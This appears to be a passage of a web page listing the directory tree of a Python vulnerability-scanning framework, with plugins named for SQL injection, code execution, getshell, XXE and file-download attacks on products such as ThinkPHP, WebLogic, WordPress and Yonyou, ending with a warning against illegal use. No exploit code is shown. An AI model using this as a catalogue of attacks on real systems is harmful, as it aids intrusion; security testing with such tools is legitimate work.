│          shopnc_index_class_id_sqli.cpython-37.pyc
│
├─shopnum
│  │  GuidBuyList_sqli.py
│  │  ProductDetail_sqli.py
│  │  ProductListCategory_sqli.py
│  │  ShoppingCart1_sqli.py
│  │
│  └─__pycache__
│          GuidBuyList_sqli.cpython-37.pyc
│          ProductDetail_sqli.cpython-37.pyc
│          ProductListCategory_sqli.cpython-37.pyc
│          shopnum_GuidBuyList_sqli.cpython-37.pyc
│          shopnum_ProductDetail_sqli.cpython-37.pyc
│          shopnum_ProductListCategory_sqli.cpython-37.pyc
│          shopnum_ShoppingCart1_sqli.cpython-37.pyc
│          ShoppingCart1_sqli.cpython-37.pyc
│
├─siteengine
│  │  comments_module_sqli.py
│  │
│  └─__pycache__
│          comments_module_sqli.cpython-37.pyc
│          siteengine_comments_module_sqli.cpython-37.pyc
│
├─siteserver
│  │  background_administrator_sqli.py
│  │  background_keywordsFilting_sqli.py
│  │  background_log_sqli.py
│  │  background_taskLog_sqli.py
│  │  UserNameCollection_sqli.py
│  │
│  └─__pycache__
│          background_administrator_sqli.cpython-37.pyc
│          background_keywordsFilting_sqli.cpython-37.pyc
│          background_log_sqli.cpython-37.pyc
│          background_taskLog_sqli.cpython-37.pyc
│          siteserver_background_administrator_sqli.cpython-37.pyc
│          siteserver_background_keywordsFilting_sqli.cpython-37.pyc
│          siteserver_background_log_sqli.cpython-37.pyc
│          siteserver_background_taskLog_sqli.cpython-37.pyc
│          siteserver_UserNameCollection_sqli.cpython-37.pyc
│          UserNameCollection_sqli.cpython-37.pyc
│
├─smartoa
│  │  multi_filedownload.py
│  │
│  └─__pycache__
│          multi_filedownload.cpython-37.pyc
│          smartoa_multi_filedownload.cpython-37.pyc
│
├─smtp
│  │  starttls_plaintext_inj.py
│  │
│  └─__pycache__
│          smtp_starttls_plaintext_inj.cpython-37.pyc
│          starttls_plaintext_inj.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─speedcms
│  │  list_cid_sqli.py
│  │
│  └─__pycache__
│          list_cid_sqli.cpython-37.pyc
│          speedcms_list_cid_sqli.cpython-37.pyc
│
├─srun
│  │  download_file_filedownload.py
│  │  index_file_filedownload.py
│  │  rad_online_bypass_rce.py
│  │  rad_online_username_rce.py
│  │  user_info_uid_rce.py
│  │
│  └─__pycache__
│          download_file_filedownload.cpython-37.pyc
│          index_file_filedownload.cpython-37.pyc
│          rad_online_bypass_rce.cpython-37.pyc
│          rad_online_username_rce.cpython-37.pyc
│          srun_download_file_filedownload.cpython-37.pyc
│          srun_index_file_filedownload.cpython-37.pyc
│          srun_rad_online_bypass_rce.cpython-37.pyc
│          srun_rad_online_username_rce.cpython-37.pyc
│          srun_user_info_uid_rce.cpython-37.pyc
│          user_info_uid_rce.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─tcexam
│  │  reinstall_getshell.py
│  │
│  └─__pycache__
│          reinstall_getshell.cpython-37.pyc
│          tcexam_reinstall_getshell.cpython-37.pyc
│
├─thinkphp
│  │  code_exec.py
│  │  onethink_category_sqli.py
│  │  v5x_code_exec.py
│  │
│  └─__pycache__
│          code_exec.cpython-37.pyc
│          onethink_category_sqli.cpython-37.pyc
│          thinkphp_code_exec.cpython-37.pyc
│          thinkphp_v5x_code_exec.cpython-37.pyc
│          thinkphp_v5x_code_exec_1.cpython-37.pyc
│          thinkphp_v5x_code_exec_2.cpython-37.pyc
│          thinkphp_v5_exec.cpython-37.pyc
│          v5x_code_exec.cpython-37.pyc
│
├─thinksns
│  │  category_code_exec.py
│  │
│  └─__pycache__
│          category_code_exec.cpython-37.pyc
│          thinksns_category_code_exec.cpython-37.pyc
│
├─tomcat
│  │  put_exec.py
│  │
│  └─__pycache__
│          put_exec.cpython-37.pyc
│          tomcat_put_exec.cpython-37.pyc
│          tomcat_weak_pass.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─topsec
│  │  change_lan_filedownload.py
│  │
│  └─__pycache__
│          change_lan_filedownload.cpython-37.pyc
│          topsec_change_lan_filedownload.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─trs
│  │  ids_auth_disclosure.py
│  │  infogate_register.py
│  │  infogate_xxe.py
│  │  inforadar_disclosure.py
│  │  lunwen_papercon_sqli.py
│  │  was40_passwd_disclosure.py
│  │  was40_tree_disclosure.py
│  │  was5_config_disclosure.py
│  │  was5_download_templet.py
│  │  wcm_default_user.py
│  │  wcm_infoview_disclosure.py
│  │  wcm_pre_as_lfi.py
│  │  wcm_service_writefile.py
│  │
│  └─__pycache__
│          ids_auth_disclosure.cpython-37.pyc
│          infogate_register.cpython-37.pyc
│          infogate_xxe.cpython-37.pyc
│          inforadar_disclosure.cpython-37.pyc
│          lunwen_papercon_sqli.cpython-37.pyc
│          trs_ids_auth_disclosure.cpython-37.pyc
│          trs_infogate_register.cpython-37.pyc
│          trs_infogate_xxe.cpython-37.pyc
│          trs_inforadar_disclosure.cpython-37.pyc
│          trs_lunwen_papercon_sqli.cpython-37.pyc
│          trs_was40_passwd_disclosure.cpython-37.pyc
│          trs_was40_tree_disclosure.cpython-37.pyc
│          trs_was5_config_disclosure.cpython-37.pyc
│          trs_was5_download_templet.cpython-37.pyc
│          trs_wcm_default_user.cpython-37.pyc
│          trs_wcm_infoview_disclosure.cpython-37.pyc
│          trs_wcm_pre_as_lfi.cpython-37.pyc
│          trs_wcm_service_writefile.cpython-37.pyc
│          was40_passwd_disclosure.cpython-37.pyc
│          was40_tree_disclosure.cpython-37.pyc
│          was5_config_disclosure.cpython-37.pyc
│          was5_download_templet.cpython-37.pyc
│          wcm_default_user.cpython-37.pyc
│          wcm_infoview_disclosure.cpython-37.pyc
│          wcm_pre_as_lfi.cpython-37.pyc
│          wcm_service_writefile.cpython-37.pyc
│
├─typecho
│  │  install_code_exec.py
│  │
│  └─__pycache__
│          install_code_exec.cpython-37.pyc
│          typecho_install_code_exec.cpython-37.pyc
│
├─umail
│  │  physical_path.py
│  │  sessionid_access.py
│  │
│  └─__pycache__
│          physical_path.cpython-37.pyc
│          sessionid_access.cpython-37.pyc
│          umail_physical_path.cpython-37.pyc
│          umail_sessionid_access.cpython-37.pyc
│
├─urp
│  │  query.py
│  │  query2.py
│  │  ReadJavaScriptServlet_fileread.py
│  │
│  └─__pycache__
│          query.cpython-37.pyc
│          query2.cpython-37.pyc
│          ReadJavaScriptServlet_fileread.cpython-37.pyc
│          urp_query.cpython-37.pyc
│          urp_query2.cpython-37.pyc
│          urp_ReadJavaScriptServlet_fileread.cpython-37.pyc
│
├─v2tech
│  │  v2Conference_sqli_xxe.py
│  │
│  └─__pycache__
│          v2Conference_sqli_xxe.cpython-37.pyc
│
├─viewgood
│  │  pic_proxy_sqli.py
│  │  two_sqli.py
│  │  viewgood_GetCaption_sqli.py
│  │
│  └─__pycache__
│          pic_proxy_sqli.cpython-37.pyc
│          two_sqli.cpython-37.pyc
│          viewgood_GetCaption_sqli.cpython-37.pyc
│          viewgood_pic_proxy_sqli.cpython-37.pyc
│          viewgood_two_sqli.cpython-37.pyc
│
├─weaver_oa
│  │  code_exec.py
│  │  db_disclosure.py
│  │  download_sqli.py
│  │  filedownload.py
│  │
│  └─__pycache__
│          code_exec.cpython-37.pyc
│          db_disclosure.cpython-37.pyc
│          download_sqli.cpython-37.pyc
│          filedownload.cpython-37.pyc
│          weaver_oa_db_disclosure.cpython-37.pyc
│          weaver_oa_download_sqli.cpython-37.pyc
│          weaver_oa_filedownload.cpython-37.pyc
│
├─weblogic
│  │  interface_disclosure.py
│  │  ssrf.py
│  │  weak_pass.py
│  │  weblogic_CVE_2018_2628.py
│  │  ws_utc_xxe.py
│  │  xmldecoder_exec.py
│  │
│  └─__pycache__
│          interface_disclosure.cpython-37.pyc
│          ssrf.cpython-37.pyc
│          weak_pass.cpython-37.pyc
│          weblogic_CVE_2018_2628.cpython-37.pyc
│          weblogic_interface_disclosure.cpython-37.pyc
│          weblogic_ssrf.cpython-37.pyc
│          weblogic_weak_pass.cpython-37.pyc
│          weblogic_ws_utc_xxe.cpython-37.pyc
│          weblogic_xmldecoder_exec.cpython-37.pyc
│          ws_utc_xxe.cpython-37.pyc
│          xmldecoder_exec.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─wecenter
│  │  topic_id_sqli.py
│  │
│  └─__pycache__
│          topic_id_sqli.cpython-37.pyc
│          wecenter_topic_id_sqli.cpython-37.pyc
│
├─weway
│  │  PictureView1_filedownload.py
│  │
│  └─__pycache__
│          PictureView1_filedownload.cpython-37.pyc
│          weway_PictureView1_filedownload.cpython-37.pyc
│
├─wizbank
│  │  download_filedownload.py
│  │  usr_id_sqli.py
│  │
│  └─__pycache__
│          download_filedownload.cpython-37.pyc
│          usr_id_sqli.cpython-37.pyc
│          wizbank_download_filedownload.cpython-37.pyc
│          wizbank_usr_id_sqli.cpython-37.pyc
│
├─wordpress
│  │  admin_ajax_filedownload.py
│  │  display_widgets_backdoor.py
│  │  plugin_azonpop_sqli.py
│  │  plugin_mailpress_rce.py
│  │  plugin_ShortCode_lfi.py
│  │  restapi_sqli.py
│  │  url_redirect.py
│  │  woocommerce_code_exec.py
│  │
│  └─__pycache__
│          admin_ajax_filedownload.cpython-37.pyc
│          display_widgets_backdoor.cpython-37.pyc
│          plugin_azonpop_sqli.cpython-37.pyc
│          plugin_mailpress_rce.cpython-37.pyc
│          plugin_ShortCode_lfi.cpython-37.pyc
│          restapi_sqli.cpython-37.pyc
│          url_redirect.cpython-37.pyc
│          woocommerce_code_exec.cpython-37.pyc
│          wordpress_admin_ajax_filedownload.cpython-37.pyc
│          wordpress_display_widgets_backdoor.cpython-37.pyc
│          wordpress_plugin_azonpop_sqli.cpython-37.pyc
│          wordpress_plugin_mailpress_rce.cpython-37.pyc
│          wordpress_plugin_ShortCode_lfi.cpython-37.pyc
│          wordpress_restapi_sqli.cpython-37.pyc
│          wordpress_url_redirect.cpython-37.pyc
│          wordpress_woocommerce_code_exec.cpython-37.pyc
│
├─xplus
│  │  mysql_mssql_sqli.py
│  │  v2003_getshell.py
│  │
│  └─__pycache__
│          mysql_mssql_sqli.cpython-37.pyc
│          v2003_getshell.cpython-37.pyc
│          xplus_2003_getshell.cpython-37.pyc
│          xplus_mysql_mssql_sqli.cpython-37.pyc
│
├─yonyou
│  │  a8_CmxUser_sqli.py
│  │  a8_getshell.py
│  │  a8_logs_disclosure.py
│  │  a8_personService_xxe.py
│  │  cm_info_content_sqli.py
│  │  createMysql_disclosure.py
│  │  ehr_ELTextFile.py
│  │  ehr_resetpwd_sqli.py
│  │  fe_treeXml_sqli.py
│  │  getemaildata_fileread.py
│  │  icc_struts2.py
│  │  initData_disclosure.py
│  │  multi_union_sqli.py
│  │  nc_NCFindWeb_fileread.py
│  │  status_default_pwd.py
│  │  test_sqli.py
│  │  user_ids_sqli.py
│  │  yonyou_nc_Unauthorized.py
│  │
│  └─__pycache__
│          a8_CmxUser_sqli.cpython-37.pyc
│          a8_getshell.cpython-37.pyc
│          a8_logs_disclosure.cpython-37.pyc
│          a8_personService_xxe.cpython-37.pyc
│          cm_info_content_sqli.cpython-37.pyc
│          createMysql_disclosure.cpython-37.pyc
│          ehr_ELTextFile.cpython-37.pyc
│          ehr_resetpwd_sqli.cpython-37.pyc
│          fe_treeXml_sqli.cpython-37.pyc
│          getemaildata_fileread.cpython-37.pyc
│          icc_struts2.cpython-37.pyc
│          initData_disclosure.cpython-37.pyc
│          multi_union_sqli.cpython-37.pyc
│          nc_NCFindWeb_fileread.cpython-37.pyc
│          status_default_pwd.cpython-37.pyc
│          test_sqli.cpython-37.pyc
│          u8_CmxItem.cpython-37.pyc
│          u8_CmxItem_sqli.cpython-37.pyc
│          user_ids_sqli.cpython-37.pyc
│          yonyou_a8_CmxUser_sqli.cpython-37.pyc
│          yonyou_a8_logs_disclosure.cpython-37.pyc
│          yonyou_a8_personService_xxe.cpython-37.pyc
│          yonyou_cm_info_content_sqli.cpython-37.pyc
│          yonyou_createMysql_disclosure.cpython-37.pyc
│          yonyou_ehr_ELTextFile.cpython-37.pyc
│          yonyou_ehr_resetpwd_sqli.cpython-37.pyc
│          yonyou_fe_treeXml_sqli.cpython-37.pyc
│          yonyou_getemaildata_fileread.cpython-37.pyc
│          yonyou_icc_struts2.cpython-37.pyc
│          yonyou_initData_disclosure.cpython-37.pyc
│          yonyou_multi_union_sqli.cpython-37.pyc
│          yonyou_nc_NCFindWeb_fileread.cpython-37.pyc
│          yonyou_nc_Unauthorized.cpython-37.pyc
│          yonyou_status_default_pwd.cpython-37.pyc
│          yonyou_test_sqli.cpython-37.pyc
│          yonyou_u8_CmxItem_sqli.cpython-37.pyc
│          yonyou_user_ids_sqli.cpython-37.pyc
│
├─zabbix
│  │  jsrpc_profileIdx2_sqli.py
│  │
│  └─__pycache__
│          jsrpc_profileIdx2_sqli.cpython-37.pyc
│          zabbix_jsrpc_profileIdx2_sqli.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─zfsoft
│  │  database_control.py
│  │  default3_bruteforce.py
│  │
│  ├─xml
│  │      zfsoft_service_stryhm_sqli_false.xml
│  │      zfsoft_service_stryhm_sqli_true.xml
│  │
│  └─__pycache__
│          database_control.cpython-37.pyc
│          default3_bruteforce.cpython-37.pyc
│          service_stryhm_sqli.cpython-37.pyc
│          zfsoft_database_control.cpython-37.pyc
│          zfsoft_default3_bruteforce.cpython-37.pyc
│          zfsoft_service_stryhm_sqli.cpython-37.pyc
│
├─zookeeper
│  │  unauth.py
│  │
│  └─__pycache__
│          unauth.cpython-37.pyc
│          zookeeper_unauth.cpython-37.pyc
│          __init__.cpython-37.pyc
│
├─zuitu
│  │  coupon_id_sqli.py
│  │
│  └─__pycache__
│          coupon_id_sqli.cpython-37.pyc
│          zuitu_coupon_id_sqli.cpython-37.pyc
│
└─__pycache__
cmsmain.cpython-37.pyc
Plugins.cpython-37.pyc
systemmain.cpython-37.pyc
__init__.cpython-37.pyc

警告!

请勿用于非法用途!否则自行承担一切后果

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用*标注